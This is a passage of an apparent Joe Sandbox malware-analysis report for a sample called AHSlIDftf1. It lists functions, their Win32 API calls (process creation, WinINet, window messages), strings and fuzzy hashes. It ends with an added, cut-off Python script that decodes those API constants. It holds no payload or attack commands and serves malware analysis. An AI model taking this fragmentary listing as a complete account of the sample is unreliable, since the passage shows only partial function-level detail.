                                                                                                             • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #
                                                                                                            • API String ID: 0-1885708031
                                                                                                            • Opcode ID: 8d51871ad636c31f017a2a19f299488046c51ea6c4b825cee51dc9142907bf85
                                                                                                            • Instruction ID: 5fccd80f7341e333c7b36e04ea09dc8647669dfc7bc475fb28080da5b5e1c1a1
                                                                                                            • Opcode Fuzzy Hash: 8d51871ad636c31f017a2a19f299488046c51ea6c4b825cee51dc9142907bf85
                                                                                                            • Instruction Fuzzy Hash: 11512279900246DFDF19DF28C4916BA7BA5EF6A310F284059EC919B2D0DB34DD46CBB0
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00D6F2A2
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D6F2BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                            • Opcode ID: cc77fa1863b36df1d7ce9fbfaefcb87ee92c4114f35e1a030b409fd8c902e728
                                                                                                            • Instruction ID: 4eff8aeb6ff1677d4751dcbc67f20a74975cd789eb8bb6f25bff125f361fd867
                                                                                                            • Opcode Fuzzy Hash: cc77fa1863b36df1d7ce9fbfaefcb87ee92c4114f35e1a030b409fd8c902e728
                                                                                                            • Instruction Fuzzy Hash: 2A5133714187849BD320AF14EC86BAFBBF8FF94301F81884CF9D9511A5EB318569CB66
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DD57E0
                                                                                                            • _wcslen.LIBCMT ref: 00DD57EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                            • String ID: CALLARGARRAY
                                                                                                            • API String ID: 157775604-1150593374
                                                                                                            • Opcode ID: 7a32d3181c5b34f70f56355d7f20760f3d7b5b0e3cc9beb46460c464442e0387
                                                                                                            • Instruction ID: 3c7e3dbccd582d0e495c727b3a3bfcb0b18ab059436ab029f2609c944591c926
                                                                                                            • Opcode Fuzzy Hash: 7a32d3181c5b34f70f56355d7f20760f3d7b5b0e3cc9beb46460c464442e0387
                                                                                                            • Instruction Fuzzy Hash: 8641A031A00209DFCB14DFA9D8818AEBBB5FF59324F24406AE506A7355E7309D81DBB0
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DCD130
                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DCD13A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                            • String ID: |
                                                                                                            • API String ID: 596671847-2343686810
                                                                                                            • Opcode ID: be2eb29db61c95e6c81852253bcf3624f512b7513a664b544c2c7f8e43054209
                                                                                                            • Instruction ID: bc41478a9ef44fc2098618347f37cb26c76ae71f2f6f8e54d39b7be2e31bce56
                                                                                                            • Opcode Fuzzy Hash: be2eb29db61c95e6c81852253bcf3624f512b7513a664b544c2c7f8e43054209
                                                                                                            • Instruction Fuzzy Hash: 8B31D771901219ABCF15AFA4CC85AEEBFBAFF04300F144029F819A6165E631AA56DB70
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00DE3621
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DE365C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$DestroyMove
                                                                                                            • String ID: static
                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                            • Opcode ID: 0fc1e2fcc53e742836d13bda9e417e1bb5dd5a9ff7e7c53a79c4bec00daa775d
                                                                                                            • Instruction ID: 76c482d9b616f53aca4db37cda004337f0a414b07ddaa82a759def61fc22f75a
                                                                                                            • Opcode Fuzzy Hash: 0fc1e2fcc53e742836d13bda9e417e1bb5dd5a9ff7e7c53a79c4bec00daa775d
                                                                                                            • Instruction Fuzzy Hash: 6E31AD71110684AEDB14AF39CC84EBB73A9FF88720F00961DF8A5D7290DA30AD81D770
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00DE461F
                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DE4634
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: '
                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                            • Opcode ID: af1ae848bf87c610857a3ac3a4767930f45c54c3f3cfbb562649a560904b5688
                                                                                                            • Instruction ID: 64cf11340bb669dbaf04d1016bcc5fe42aae1fecc96205386ba61235e29ca4f6
                                                                                                            • Opcode Fuzzy Hash: af1ae848bf87c610857a3ac3a4767930f45c54c3f3cfbb562649a560904b5688
                                                                                                            • Instruction Fuzzy Hash: E9310774A013599FDB14DFAAC990BDABBB5FF49300F14406AE905AB391D770A941CFA0
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DE327C
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE3287
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: Combobox
                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                            • Opcode ID: d8f21d07d349cb0f8785b3198f78792f16491ff1274bfd0c28475e52d7e18e37
                                                                                                            • Instruction ID: decfae717b79807dab4a3c1e1e8e756fb77d3e2a0c7a56b50628ad6c59f567ab
                                                                                                            • Opcode Fuzzy Hash: d8f21d07d349cb0f8785b3198f78792f16491ff1274bfd0c28475e52d7e18e37
                                                                                                            • Instruction Fuzzy Hash: 0D11E2713002487FEF25AE55DC88EBB37AAEB94364F140128FA58AB290D631DD518774
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D5600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
                                                                                                              • Part of subcall function 00D5600E: GetStockObject.GDI32(00000011), ref: 00D56060
                                                                                                              • Part of subcall function 00D5600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00DE377A
                                                                                                            • GetSysColor.USER32(00000012), ref: 00DE3794
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                            • String ID: static
                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                            • Opcode ID: 142829a0429874bd0113eafb4fc13ab0aab644642edfc3a1cce86e21bcf9e628
                                                                                                            • Instruction ID: 16436a17d78328f1f562391f35bb75bce27d5d21d0b1973d434943f35e5a8397
                                                                                                            • Opcode Fuzzy Hash: 142829a0429874bd0113eafb4fc13ab0aab644642edfc3a1cce86e21bcf9e628
                                                                                                            • Instruction Fuzzy Hash: F01156B2610249AFDF10EFA8CC4AAFA7BB8EB08314F004924FD55E3250E734E9119B60
                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DCCD7D
                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DCCDA6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$OpenOption
                                                                                                            • String ID: <local>
                                                                                                            • API String ID: 942729171-4266983199
                                                                                                            • Opcode ID: f43949473f4f5d2e139e4b6e59d29d6124bba5d42250b7c3c0aec01b0304bf50
                                                                                                            • Instruction ID: 4b8a0e1adba8d537a404c0372b1a3bd3f6d70bbde230a88e2c8fb4a28a7f6ba6
                                                                                                            • Opcode Fuzzy Hash: f43949473f4f5d2e139e4b6e59d29d6124bba5d42250b7c3c0aec01b0304bf50
                                                                                                            • Instruction Fuzzy Hash: 1011E371621633BAD7345A668C84FE3BE68EB127A4F00522AF24E83180D2709841D6F0
                                                                                                            APIs
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00DE34AB
                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DE34BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                            • String ID: edit
                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                            • Opcode ID: 463113b0fdf6ca9a9586681fe0248dc3910ac23132617ca9440f982856116039
                                                                                                            • Instruction ID: d4da44a177282265b9b0e1a075cc80b11e2dc863ca886981921be9c306e3c485
                                                                                                            • Opcode Fuzzy Hash: 463113b0fdf6ca9a9586681fe0248dc3910ac23132617ca9440f982856116039
                                                                                                            • Instruction Fuzzy Hash: CE11BF71100288AFEB126E66DC88ABB376AEB05374F904324F965D71E0C731DD519B70
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00DB6CB6
                                                                                                            • _wcslen.LIBCMT ref: 00DB6CC2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: STOP
                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                            • Opcode ID: 2cafcc0c993f58fddfc637f138636fd306f5e79400e44aa8960a3e748a5895ce
                                                                                                            • Instruction ID: 48fb1507faed3d595054b151ab69053a1b2a5949d3a91f5d7d7d82ef278148cd
                                                                                                            • Opcode Fuzzy Hash: 2cafcc0c993f58fddfc637f138636fd306f5e79400e44aa8960a3e748a5895ce
                                                                                                            • Instruction Fuzzy Hash: 80010432A00526CBCB20AFBDCC918FF7BA5EA607107440928E85396190EB39D844C670
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DB1D4C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: e6831ac2f8aca19466e6b0e118fa9972080ca9809269b50fe5217f47f8781da7
                                                                                                            • Instruction ID: 7bcf0fec1541c5451685cb757b3df35106ab570d37800f1fc628d6498ead3c9f
                                                                                                            • Opcode Fuzzy Hash: e6831ac2f8aca19466e6b0e118fa9972080ca9809269b50fe5217f47f8781da7
                                                                                                            • Instruction Fuzzy Hash: 8C01D479601218EB8F18EBA4CC61CFEB7A9EB56350B540A19FC63673D1EA30991C8670
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DB1C46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 8f667e99ff654988019612e587a5cfcc6c08a13222f0de83c4249e146e718271
                                                                                                            • Instruction ID: 20ffd8aa884f2a70ad922ded485a7a1f27a4dcc19968b14d3af91760c7c9516a
                                                                                                            • Opcode Fuzzy Hash: 8f667e99ff654988019612e587a5cfcc6c08a13222f0de83c4249e146e718271
                                                                                                            • Instruction Fuzzy Hash: 34016779681204E6CF14EB90C962DFFBBA9DB55340F540419AC5777282EA309E1C96B1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DB1CC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: b81e27b530cff030fc3d802787f8e58f578774b86802ba8b2df7e376e4361447
                                                                                                            • Instruction ID: 12da372de9f9a7aee8866be304d72d9624a311ff864793dc04e44da413e4c5c7
                                                                                                            • Opcode Fuzzy Hash: b81e27b530cff030fc3d802787f8e58f578774b86802ba8b2df7e376e4361447
                                                                                                            • Instruction Fuzzy Hash: 3C01A7B9640214E6CF14E795CA21EFEBBA8DB11340B540415BC0373281EA209F189671
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00DB1DD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: c86d923c40f416ca3362d0566a4ae3aaf9cac46f09f0ea2423b35f41fe7b0ab4
                                                                                                            • Instruction ID: 5818137273f901f56729e8276b865ada133951843cdcdbdbedc4f06ba76a4d3e
                                                                                                            • Opcode Fuzzy Hash: c86d923c40f416ca3362d0566a4ae3aaf9cac46f09f0ea2423b35f41fe7b0ab4
                                                                                                            • Instruction Fuzzy Hash: 39F08175A51314E6DB14A7A4CC62EFEB768EB11350F940919BC63672C2DA70990C8270
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E23018,00E2305C), ref: 00DE81BF
                                                                                                            • CloseHandle.KERNEL32 ref: 00DE81D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: \0
                                                                                                            • API String ID: 3712363035-3218720685
                                                                                                            • Opcode ID: f41c34943f9c47c6caa327ea478243c282c55a16b50de41a31d1bf69cc07f80a
                                                                                                            • Instruction ID: cba6c09d37d2f7188a9adba59e69e137416021306d3eb8134083fcd7ff3b5e64
                                                                                                            • Opcode Fuzzy Hash: f41c34943f9c47c6caa327ea478243c282c55a16b50de41a31d1bf69cc07f80a
                                                                                                            • Instruction Fuzzy Hash: 3DF082B1640350BEE3207772AC46FB73A5CEB05751F004424BB4CE91A2D67D8E059BF8
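The function entries above report their Win32 calls with raw numeric arguments: the SendMessageW handlers that dispatch on the ComboBox/ListBox class name carry the message ID in the second argument, and the CreateProcessW/CloseHandle entry carries dwCreationFlags in the sixth. The Python script below is an added example and is not code from the Joe Sandbox report or its IDA plugin. It parses the "APIs" blocks in the layout shown on this page, names the message and creation-flag constants, and keeps the "Part of subcall function" lines apart from the function's own calls, because those lines are inlined from callees (GetClassNameW belongs to 00DB3CA7 and _wcslen to 00D59CB3, not to the function whose hash is listed). The constant tables are copied from winuser.h and winbase.h and cover only the values that occur here; the parsing rules are an assumption about the report layout, and SAMPLE_LISTING is constructed from four of the entries above.

```python
"""Decode the raw Win32 constants in a Joe Sandbox per-function API listing.

Added example, not code from the Joe Sandbox report: it parses the "APIs"
blocks as laid out on the page and names the uMsg and dwCreationFlags values.
"""
import re

# Assumed constants, copied from winuser.h / winbase.h (only the values relevant here).
MSG_NAMES = {
    0x000D: "WM_GETTEXT",
    0x000E: "WM_GETTEXTLENGTH",
    0x00B1: "EM_SETSEL",
    0x0148: "CB_GETLBTEXT",
    0x0158: "CB_FINDSTRINGEXACT",
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
    0x0189: "LB_GETTEXT",
    0x018B: "LB_GETCOUNT",
    0x01A2: "LB_FINDSTRINGEXACT",
}
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000020: "NORMAL_PRIORITY_CLASS",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x08000000: "CREATE_NO_WINDOW",
}

# One "APIs" bullet as printed by the report (assumed layout), e.g.
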